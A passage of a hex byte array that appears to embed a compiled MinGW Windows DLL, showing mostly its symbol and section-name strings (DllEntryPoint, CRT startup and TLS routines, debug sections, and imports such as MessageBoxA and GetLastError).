,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xeb ,0x12 ,0x00 ,0x00 ,0xa8 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x03 ,0x13 ,0x00 ,0x00 ,0xa0 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x12 ,0x13 ,0x00 ,0x00 ,0x48 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x76 ,0x66 ,0x70 ,0x72 ,0x69 ,0x6e ,0x74 ,0x66 ,0x80 ,0x17 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x66 ,0x72 ,0x65 ,0x65 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa8 ,0x17 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x22 ,0x13 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x34 ,0x13 ,0x00 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x61 ,0x72 ,0x61 ,0x6e ,0x67 ,0x65 ,0x73 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x69 ,0x6e ,0x66 ,0x6f ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x61 ,0x62 ,0x62 ,0x72 ,0x65 ,0x76 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x6c ,0x69 ,0x6e ,0x65 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x66 ,0x72 ,0x61 ,0x6d ,0x65 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x73 ,0x74 ,0x72 ,0x00 ,0x70 ,0x72 ,0x65 ,0x5f ,0x63 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x00 ,0x61 ,0x74 ,0x65 ,0x78 ,0x69 ,0x74 ,0x5f ,0x74 ,0x61 ,0x62 ,0x6c ,0x65 ,0x00 ,0x5f ,0x43 ,0x52 ,0x54 ,0x5f ,0x49 ,0x4e ,0x49 ,0x54 ,0x00 ,0x5f ,0x5f ,0x70 ,0x72 ,0x6f ,0x63 ,0x5f ,0x61 ,0x74 ,0x74 ,0x61 ,0x63 ,0x68 ,0x65 ,0x64 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x5f ,0x6c ,0x6f ,0x63 ,0x6b ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x5f ,0x73 ,0x74 ,0x61 ,0x74 ,0x65 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x64 ,0x79 ,0x6e ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x5f ,0x63 ,0x61 ,0x6c ,0x6c ,0x62 ,0x61 ,0x63 ,0x6b ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x78 ,0x69 ,0x5f ,0x7a ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x78 ,0x69 ,0x5f ,0x61 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x78 ,0x63 ,0x5f ,0x7a ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x78 ,0x63 ,0x5f ,0x61 ,0x00 ,0x5f ,0x5f ,0x44 ,0x6c ,0x6c ,0x4d ,0x61 ,0x69 ,0x6e ,0x43 ,0x52 ,0x54 ,0x53 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x64 ,0x6c ,0x6c ,0x6d ,0x61 ,0x69 ,0x6e ,0x5f ,0x72 ,0x65 ,0x61 ,0x73 ,0x6f ,0x6e ,0x00 ,0x44 ,0x6c ,0x6c ,0x4d ,0x61 ,0x69 ,0x6e ,0x43 ,0x52 ,0x54 ,0x53 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x61 ,0x70 ,0x70 ,0x5f ,0x74 ,0x79 ,0x70 ,0x65 ,0x00 ,0x2e ,0x43 ,0x52 ,0x54 ,0x24 ,0x58 ,0x49 ,0x41 ,0x41 ,0x00 ,0x5f ,0x5f ,0x67 ,0x63 ,0x63 ,0x5f ,0x72 ,0x65 ,0x67 ,0x69 ,0x73 ,0x74 ,0x65 ,0x72 ,0x5f ,0x66 ,0x72 ,0x61 ,0x6d ,0x65 ,0x00 ,0x5f ,0x5f ,0x67 ,0x63 ,0x63 ,0x5f ,0x64 ,0x65 ,0x72 ,0x65 ,0x67 ,0x69 ,0x73 ,0x74 ,0x65 ,0x72 ,0x5f ,0x66 ,0x72 ,0x61 ,0x6d ,0x65 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x7a ,0x7a ,0x7a ,0x00 ,0x5f ,0x5f ,0x64 ,0x6f ,0x5f ,0x67 ,0x6c ,0x6f ,0x62 ,0x61 ,0x6c ,0x5f ,0x64 ,0x74 ,0x6f ,0x72 ,0x73 ,0x00 ,0x5f ,0x5f ,0x64 ,0x6f ,0x5f ,0x67 ,0x6c ,0x6f ,0x62 ,0x61 ,0x6c ,0x5f ,0x63 ,0x74 ,0x6f ,0x72 ,0x73 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x43 ,0x54 ,0x4f ,0x52 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x69 ,0x6e ,0x69 ,0x74 ,0x69 ,0x61 ,0x6c ,0x69 ,0x7a ,0x65 ,0x64 ,0x00 ,0x5f ,0x5f ,0x73 ,0x65 ,0x63 ,0x75 ,0x72 ,0x69 ,0x74 ,0x79 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x5f ,0x63 ,0x6f ,0x6f ,0x6b ,0x69 ,0x65 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x5f ,0x5f ,0x73 ,0x65 ,0x63 ,0x75 ,0x72 ,0x69 ,0x74 ,0x79 ,0x5f ,0x63 ,0x6f ,0x6f ,0x6b ,0x69 ,0x65 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x5f ,0x5f ,0x73 ,0x65 ,0x63 ,0x75 ,0x72 ,0x69 ,0x74 ,0x79 ,0x5f ,0x63 ,0x6f ,0x6f ,0x6b ,0x69 ,0x65 ,0x5f ,0x63 ,0x6f ,0x6d ,0x70 ,0x6c ,0x65 ,0x6d ,0x65 ,0x6e ,0x74 ,0x00 ,0x5f ,0x5f ,0x72 ,0x65 ,0x70 ,0x6f ,0x72 ,0x74 ,0x5f ,0x67 ,0x73 ,0x66 ,0x61 ,0x69 ,0x6c ,0x75 ,0x72 ,0x65 ,0x00 ,0x47 ,0x53 ,0x5f ,0x43 ,0x6f ,0x6e ,0x74 ,0x65 ,0x78 ,0x74 ,0x52 ,0x65 ,0x63 ,0x6f ,0x72 ,0x64 ,0x00 ,0x47 ,0x53 ,0x5f ,0x45 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x52 ,0x65 ,0x63 ,0x6f ,0x72 ,0x64 ,0x00 ,0x47 ,0x53 ,0x5f ,0x45 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x50 ,0x6f ,0x69 ,0x6e ,0x74 ,0x65 ,0x72 ,0x73 ,0x00 ,0x5f ,0x5f ,0x64 ,0x79 ,0x6e ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x64 ,0x74 ,0x6f ,0x72 ,0x00 ,0x5f ,0x5f ,0x64 ,0x79 ,0x6e ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x43 ,0x52 ,0x54 ,0x5f ,0x4d ,0x54 ,0x00 ,0x5f ,0x5f ,0x74 ,0x6c ,0x72 ,0x65 ,0x67 ,0x64 ,0x74 ,0x6f ,0x72 ,0x00 ,0x5f ,0x64 ,0x65 ,0x63 ,0x6f ,0x64 ,0x65 ,0x5f ,0x70 ,0x6f ,0x69 ,0x6e ,0x74 ,0x65 ,0x72 ,0x00 ,0x5f ,0x65 ,0x6e ,0x63 ,0x6f ,0x64 ,0x65 ,0x5f ,0x70 ,0x6f ,0x69 ,0x6e ,0x74 ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x72 ,0x65 ,0x70 ,0x6f ,0x72 ,0x74 ,0x5f ,0x65 ,0x72 ,0x72 ,0x6f ,0x72 ,0x00 ,0x5f ,0x5f ,0x77 ,0x72 ,0x69 ,0x74 ,0x65 ,0x5f ,0x6d ,0x65 ,0x6d ,0x6f ,0x72 ,0x79 ,0x2e ,0x70 ,0x61 ,0x72 ,0x74 ,0x2e ,0x30 ,0x00 ,0x6d ,0x61 ,0x78 ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x73 ,0x00 ,0x5f ,0x70 ,0x65 ,0x69 ,0x33 ,0x38 ,0x36 ,0x5f ,0x72 ,0x75 ,0x6e ,0x74 ,0x69 ,0x6d ,0x65 ,0x5f ,0x72 ,0x65 ,0x6c ,0x6f ,0x63 ,0x61 ,0x74 ,0x6f ,0x72 ,0x00 ,0x77 ,0x61 ,0x73 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x2e ,0x39 ,0x35 ,0x31 ,0x37 ,0x34 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x52 ,0x55 ,0x4e ,0x54 ,0x49 ,0x4d ,0x45 ,0x5f ,0x50 ,0x53 ,0x45 ,0x55 ,0x44 ,0x4f ,0x5f ,0x52 ,0x45 ,0x4c ,0x4f ,0x43 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x45 ,0x4e ,0x44 ,0x5f ,0x5f ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x52 ,0x55 ,0x4e ,0x54 ,0x49 ,0x4d ,0x45 ,0x5f ,0x50 ,0x53 ,0x45 ,0x55 ,0x44 ,0x4f ,0x5f ,0x52 ,0x45 ,0x4c ,0x4f ,0x43 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x69 ,0x6d ,0x61 ,0x67 ,0x65 ,0x5f ,0x62 ,0x61 ,0x73 ,0x65 ,0x5f ,0x5f ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x2e ,0x75 ,0x6e ,0x6c ,0x69 ,0x6b ,0x65 ,0x6c ,0x79 ,0x00 ,0x2e ,0x78 ,0x64 ,0x61 ,0x74 ,0x61 ,0x2e ,0x75 ,0x6e ,0x6c ,0x69 ,0x6b ,0x65 ,0x6c ,0x79 ,0x00 ,0x2e ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x2e ,0x75 ,0x6e ,0x6c ,0x69 ,0x6b ,0x65 ,0x6c ,0x79 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x53 ,0x45 ,0x48 ,0x5f ,0x65 ,0x72 ,0x72 ,0x6f ,0x72 ,0x5f ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x5f ,0x65 ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x72 ,0x00 ,0x77 ,0x61 ,0x73 ,0x5f ,0x68 ,0x65 ,0x72 ,0x65 ,0x2e ,0x39 ,0x35 ,0x30 ,0x31 ,0x33 ,0x00 ,0x65 ,0x6d ,0x75 ,0x5f ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x65 ,0x6d ,0x75 ,0x5f ,0x78 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x5f ,0x67 ,0x6e ,0x75 ,0x5f ,0x65 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x5f ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x74 ,0x68 ,0x72 ,0x5f ,0x72 ,0x75 ,0x6e ,0x5f ,0x6b ,0x65 ,0x79 ,0x5f ,0x64 ,0x74 ,0x6f ,0x72 ,0x73 ,0x2e ,0x70 ,0x61 ,0x72 ,0x74 ,0x2e ,0x30 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x74 ,0x68 ,0x72 ,0x5f ,0x63 ,0x73 ,0x00 ,0x6b ,0x65 ,0x79 ,0x5f ,0x64 ,0x74 ,0x6f ,0x72 ,0x5f ,0x6c ,0x69 ,0x73 ,0x74 ,0x00 ,0x5f ,0x5f ,0x5f ,0x77 ,0x36 ,0x34 ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x74 ,0x68 ,0x72 ,0x5f ,0x61 ,0x64 ,0x64 ,0x5f ,0x6b ,0x65 ,0x79 ,0x5f ,0x64 ,0x74 ,0x6f ,0x72 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x74 ,0x68 ,0x72 ,0x5f ,0x63 ,0x73 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x00 ,0x5f ,0x5f ,0x5f ,0x77 ,0x36 ,0x34 ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x74 ,0x68 ,0x72 ,0x5f ,0x72 ,0x65 ,0x6d ,0x6f ,0x76 ,0x65 ,0x5f ,0x6b ,0x65 ,0x79 ,0x5f ,0x64 ,0x74 ,0x6f ,0x72 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x54 ,0x4c ,0x53 ,0x63 ,0x61 ,0x6c ,0x6c ,0x62 ,0x61 ,0x63 ,0x6b ,0x00 ,0x70 ,0x73 ,0x65 ,0x75 ,0x64 ,0x6f ,0x2d ,0x72 ,0x65 ,0x6c ,0x6f ,0x63 ,0x2d ,0x6c ,0x69 ,0x73 ,0x74 ,0x2e ,0x63 ,0x00 ,0x5f ,0x56 ,0x61 ,0x6c ,0x69 ,0x64 ,0x61 ,0x74 ,0x65 ,0x49 ,0x6d ,0x61 ,0x67 ,0x65 ,0x42 ,0x61 ,0x73 ,0x65 ,0x2e ,0x70 ,0x61 ,0x72 ,0x74 ,0x2e ,0x30 ,0x00 ,0x5f ,0x56 ,0x61 ,0x6c ,0x69 ,0x64 ,0x61 ,0x74 ,0x65 ,0x49 ,0x6d ,0x61 ,0x67 ,0x65 ,0x42 ,0x61 ,0x73 ,0x65 ,0x00 ,0x5f ,0x46 ,0x69 ,0x6e ,0x64 ,0x50 ,0x45 ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x46 ,0x69 ,0x6e ,0x64 ,0x50 ,0x45 ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x42 ,0x79 ,0x4e ,0x61 ,0x6d ,0x65 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x47 ,0x65 ,0x74 ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x46 ,0x6f ,0x72 ,0x41 ,0x64 ,0x64 ,0x72 ,0x65 ,0x73 ,0x73 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x47 ,0x65 ,0x74 ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x43 ,0x6f ,0x75 ,0x6e ,0x74 ,0x00 ,0x5f ,0x46 ,0x69 ,0x6e ,0x64 ,0x50 ,0x45 ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x45 ,0x78 ,0x65 ,0x63 ,0x00 ,0x5f ,0x47 ,0x65 ,0x74 ,0x50 ,0x45 ,0x49 ,0x6d ,0x61 ,0x67 ,0x65 ,0x42 ,0x61 ,0x73 ,0x65 ,0x00 ,0x5f ,0x49 ,0x73 ,0x4e ,0x6f ,0x6e ,0x77 ,0x72 ,0x69 ,0x74 ,0x61 ,0x62 ,0x6c ,0x65 ,0x49 ,0x6e ,0x43 ,0x75 ,0x72 ,0x72 ,0x65 ,0x6e ,0x74 ,0x49 ,0x6d ,0x61 ,0x67 ,0x65 ,0x00 ,0x5f ,0x5f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x65 ,0x6e ,0x75 ,0x6d ,0x5f ,0x69 ,0x6d ,0x70 ,0x6f ,0x72 ,0x74 ,0x5f ,0x6c ,0x69 ,0x62 ,0x72 ,0x61 ,0x72 ,0x79 ,0x5f ,0x6e ,0x61 ,0x6d ,0x65 ,0x73 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x69 ,0x6e ,0x66 ,0x6f ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x61 ,0x62 ,0x62 ,0x72 ,0x65 ,0x76 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x6c ,0x69 ,0x6e ,0x65 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x61 ,0x72 ,0x61 ,0x6e ,0x67 ,0x65 ,0x73 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x73 ,0x74 ,0x72 ,0x00 ,0x2e ,0x64 ,0x65 ,0x62 ,0x75 ,0x67 ,0x5f ,0x66 ,0x72 ,0x61 ,0x6d ,0x65 ,0x00 ,0x44 ,0x6c ,0x6c ,0x45 ,0x6e ,0x74 ,0x72 ,0x79 ,0x50 ,0x6f ,0x69 ,0x6e ,0x74 ,0x00 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x69 ,0x61 ,0x6c ,0x69 ,0x7a ,0x65 ,0x5f ,0x6f ,0x6e ,0x65 ,0x78 ,0x69 ,0x74 ,0x5f ,0x74 ,0x61 ,0x62 ,0x6c ,0x65 ,0x00 ,0x5f ,0x72 ,0x65 ,0x67 ,0x69 ,0x73 ,0x74 ,0x65 ,0x72 ,0x5f ,0x6f ,0x6e ,0x65 ,0x78 ,0x69 ,0x74 ,0x5f ,0x66 ,0x75 ,0x6e ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x5f ,0x65 ,0x78 ,0x65 ,0x63 ,0x75 ,0x74 ,0x65 ,0x5f ,0x6f ,0x6e ,0x65 ,0x78 ,0x69 ,0x74 ,0x5f ,0x74 ,0x61 ,0x62 ,0x6c ,0x65 ,0x00 ,0x5f ,0x5f ,0x61 ,0x63 ,0x72 ,0x74 ,0x5f ,0x69 ,0x6f ,0x62 ,0x5f ,0x66 ,0x75 ,0x6e ,0x63 ,0x00 ,0x72 ,0x65 ,0x67 ,0x69 ,0x73 ,0x74 ,0x65 ,0x72 ,0x5f ,0x66 ,0x72 ,0x61 ,0x6d ,0x65 ,0x5f ,0x63 ,0x74 ,0x6f ,0x72 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x2e ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x00 ,0x2e ,0x78 ,0x64 ,0x61 ,0x74 ,0x61 ,0x2e ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x00 ,0x2e ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x2e ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x00 ,0x2e ,0x63 ,0x74 ,0x6f ,0x72 ,0x73 ,0x2e ,0x36 ,0x35 ,0x35 ,0x33 ,0x35 ,0x00 ,0x5f ,0x5f ,0x5f ,0x52 ,0x55 ,0x4e ,0x54 ,0x49 ,0x4d ,0x45 ,0x5f ,0x50 ,0x53 ,0x45 ,0x55 ,0x44 ,0x4f ,0x5f ,0x52 ,0x45 ,0x4c ,0x4f ,0x43 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x61 ,0x62 ,0x6f ,0x72 ,0x74 ,0x00 ,0x5f ,0x5f ,0x6c ,0x69 ,0x62 ,0x36 ,0x34 ,0x5f ,0x6c ,0x69 ,0x62 ,0x6b ,0x65 ,0x72 ,0x6e ,0x65 ,0x6c ,0x33 ,0x32 ,0x5f ,0x61 ,0x5f ,0x69 ,0x6e ,0x61 ,0x6d ,0x65 ,0x00 ,0x5f ,0x5f ,0x64 ,0x61 ,0x74 ,0x61 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x5f ,0x44 ,0x54 ,0x4f ,0x52 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x5f ,0x6c ,0x6f ,0x63 ,0x6b ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x52 ,0x74 ,0x6c ,0x56 ,0x69 ,0x72 ,0x74 ,0x75 ,0x61 ,0x6c ,0x55 ,0x6e ,0x77 ,0x69 ,0x6e ,0x64 ,0x00 ,0x53 ,0x65 ,0x74 ,0x55 ,0x6e ,0x68 ,0x61 ,0x6e ,0x64 ,0x6c ,0x65 ,0x64 ,0x45 ,0x78 ,0x63 ,0x65 ,0x70 ,0x74 ,0x69 ,0x6f ,0x6e ,0x46 ,0x69 ,0x6c ,0x74 ,0x65 ,0x72 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x63 ,0x61 ,0x6c ,0x6c ,0x6f ,0x63 ,0x00 ,0x5f ,0x5f ,0x5f ,0x74 ,0x6c ,0x73 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 ,0x2e ,0x5f ,0x5f ,0x6e ,0x61 ,0x74 ,0x69 ,0x76 ,0x65 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x75 ,0x70 ,0x5f ,0x73 ,0x74 ,0x61 ,0x74 ,0x65 ,0x00 ,0x5f ,0x5f ,0x49 ,0x6d ,0x61 ,0x67 ,0x65 ,0x42 ,0x61 ,0x73 ,0x65 ,0x00 ,0x4d ,0x65 ,0x73 ,0x73 ,0x61 ,0x67 ,0x65 ,0x42 ,0x6f ,0x78 ,0x41 ,0x00 ,0x47 ,0x65 ,0x74 ,0x4c ,0x61 ,0x73 ,0x74 ,0x45 ,0x72 ,0x72 ,0x6f ,0x72 ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x4d ,0x65 ,0x73 ,0x73 ,0x61 ,0x67 ,0x65 ,0x42 ,0x6f ,0x78 ,0x41 ,0x00 ,0x47 ,0x65 ,0x74 ,0x53 ,0x79 ,0x73 ,0x74 ,0x65 ,0x6d ,0x54 ,0x69 ,0x6d ,0x65 ,0x41 ,0x73 ,0x46 ,0x69 ,0x6c ,0x65 ,0x54 ,0x69 ,0x6d ,0x65 ,0x00 ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x5f ,0x69 ,0x6e ,0x69 ,0x74 ,0x6c ,0x74 ,0x73 ,0x73 ,0x75 ,0x6f ,0x5f ,0x66 ,0x6f ,0x72 ,0x63 ,0x65 ,0x00 ,0x5f ,0x5f ,0x72 ,0x74 ,0x5f ,0x70 ,0x73 ,0x72 ,0x65 ,0x6c ,0x6f ,0x63 ,0x73 ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x00 ,0x5f ,0x5f ,0x64 ,0x6c ,0x6c ,0x5f ,0x63 ,0x68 ,0x61 ,0x72 ,0x61 ,0x63 ,0x74 ,0x65 ,0x72 ,0x69 ,0x73 ,0x74 ,0x69 ,0x63 ,0x73 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x73 ,0x69 ,0x7a ,0x65 ,0x5f ,0x6f ,0x66 ,0x5f ,0x73 ,0x74 ,0x61 ,0x63 ,0x6b ,0x5f ,0x63 ,0x6f ,0x6d ,0x6d ,0x69 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6f ,0x62 ,0x5f ,0x66 ,0x75 ,0x6e ,0x63 ,0x00 ,0x5f ,0x5f ,0x73 ,0x69 ,0x7a ,0x65 ,0x5f ,0x6f ,0x66 ,0x5f ,0x73 ,0x74 ,0x61 ,0x63 ,0x6b ,0x5f ,0x72 ,0x65 ,0x73 ,0x65 ,0x72 ,0x76 ,0x65 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x6d ,0x61 ,0x6a ,0x6f ,0x72 ,0x5f ,0x73 ,0x75 ,0x62 ,0x73 ,0x79 ,0x73 ,0x74 ,0x65 ,0x6d ,0x5f ,0x76 ,0x65 ,0x72 ,0x73 ,0x69 ,0x6f ,0x6e ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x5f ,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x6c ,0x5f ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x69 ,0x6d ,0x70 ,0x5f ,0x44 ,0x65 ,0x6c ,0x65 ,0x74 ,0x65 ,0x43 ,0x72 ,0x69 ,0x74 ,0x69 ,0x63 ,0x61 ,0x6c ,0x53 ,0x65 ,0x63 ,0x74 ,0x69 ,0x6f ,0x6e ,0x00 ,0x2e ,0x72 ,0x65 ,0x66 ,0x70 ,0x74 ,0x72 